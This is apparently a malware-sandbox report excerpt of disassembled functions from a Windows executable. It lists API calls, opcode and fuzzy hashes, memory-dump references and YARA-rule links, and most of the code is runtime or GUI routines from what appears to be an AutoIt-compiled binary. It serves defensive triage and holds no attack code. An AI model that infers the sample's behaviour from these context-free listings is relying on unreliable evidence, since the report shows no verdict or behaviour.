                                                                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                        Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Release
                                                                                                        • String ID:
                                                                                                        • API String ID: 1035833867-0
                                                                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                        Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                        • __lock.LIBCMT ref: 004170BE
                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                        • _free.LIBCMT ref: 004170EE
                                                                                                        • InterlockedIncrement.KERNEL32(033C2CE0), ref: 00417106
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3470314060-0
                                                                                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                        Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3495660284-0
                                                                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                        Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4278518827-0
                                                                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                        Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                        • String ID:
                                                                                                        • API String ID: 442100245-0
                                                                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                        Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 621800784-4108050209
                                                                                                        • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                        • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                        Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 3884216118-234962358
                                                                                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                        Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID: AU3_GetPluginDetails$ou
                                                                                                        • API String ID: 145871493-528704710
                                                                                                        • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                        • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                        Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                        • IsMenu.USER32(?), ref: 0044854D
                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                        Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$_memmove_wcslen
                                                                                                        • String ID: ComboBox$ListBox
                                                                                                        • API String ID: 1589278365-1403004172
                                                                                                        • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                        • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                        Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle
                                                                                                        • String ID: nul
                                                                                                        • API String ID: 2519475695-2873401336
                                                                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                        Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle
                                                                                                        • String ID: nul
                                                                                                        • API String ID: 2519475695-2873401336
                                                                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                        Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
